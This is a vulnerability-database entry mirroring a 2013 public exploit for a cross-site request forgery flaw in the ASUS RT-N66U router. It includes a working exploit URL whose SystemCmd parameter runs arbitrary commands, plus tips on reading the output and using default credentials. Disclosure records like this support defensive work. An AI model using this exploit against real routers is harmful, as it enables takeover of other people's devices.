ID

VAR-E-201309-0466


TITLE

ASUS RT-N66U 3.0.0.4.374_720 Cross Site Request Forgery

Trust: 0.5

sources: PACKETSTORM: 123452

DESCRIPTION

ASUS RT-N66U suffers from a cross site request forgery vulnerability that allows for arbitrary command execution.

Trust: 0.5

sources: PACKETSTORM: 123452

AFFECTED PRODUCTS

vendor:asusmodel:rt-n66u 3.0.0.4.374 720scope: - version: -

Trust: 0.5

sources: PACKETSTORM: 123452

EXPLOIT

Exploit Title: CSRF Asus RT-N66U Arbitrary Command Execution
Google Dork: N.A.
Date: 30 September 2013
Exploit Author: cgcai (https://www.qxcg.net/arbitrary-command-execution-on-an-asus-rtn66u.html)
Vendor Homepage: http://www.asus.com/Networking/RTN66U/
Software Link: http://www.asus.com/Networking/RTN66U/#support_Download_36
Version: 3.0.0.4.374_720
Tested on: N.A.
CVE: Pending

Description:
The Asus RT-N66U is a home wireless router. Its web application has a CSRF vulnerability that allows an attacker to execute arbitrary commands on the target device.

Exploitable URL:
The parameter "SystemCmd" in the URL below causes the device to execute arbitrary commands. (The value encoded in the example is `nvram show`)

http://192.168.1.1/apply.cgi?current_page=Main_Analysis_Content.asp&next_page=cmdRet_check.htm&next_host=192.168.1.1&group_id=&modified=0&action_mode=+Refresh+&action_script=&action_wait=&first_time=&preferred_lang=EN&SystemCmd=%6e%76%72%61%6d%20%73%68%6f%77&firmver=3.0.0.4&cmdMethod=ping&destIP=www.google.com&pingCNT=5

The URL should be submitted as a `GET` request.

Console output can be observed by sending a `GET` request to `http://192.168.1.1/cmdRet_check.htm` after calling the URL above, if so desired.

The URLs above are protected with HTTP Basic Access Authentication. If a victim has logged in to the router recently, the exploit will work without further intervention. Otherwise, attackers can try supplying default credenitals in the URL.

Trust: 0.5

sources: PACKETSTORM: 123452

EXPLOIT HASH

LOCAL

SOURCE

md5: ea719bb4a1781e3cd1226501111c15d2
sha-1: 87bd2c6abaef8065d88462b341db94ba11cb4bf7
sha-256: 192a23a39c98ec854d68908e71b9d02a34e6c5ca74b7a7321c5c5bea414c569b
md5: ea719bb4a1781e3cd1226501111c15d2

Trust: 0.5

sources: PACKETSTORM: 123452

PRICE

free

Trust: 0.5

sources: PACKETSTORM: 123452

TYPE

arbitrary, csrf

Trust: 0.5

sources: PACKETSTORM: 123452

TAGS

tag:exploit

Trust: 0.5

tag:arbitrary

Trust: 0.5

tag:csrf

Trust: 0.5

sources: PACKETSTORM: 123452

CREDITS

cgcai

Trust: 0.5

sources: PACKETSTORM: 123452

EXTERNAL IDS

db:PACKETSTORMid:123452

Trust: 0.5

sources: PACKETSTORM: 123452

SOURCES

db:PACKETSTORMid:123452

LAST UPDATE DATE

2022-07-27T09:32:50.961000+00:00


SOURCES RELEASE DATE

db:PACKETSTORMid:123452date:2013-09-30T10:11:11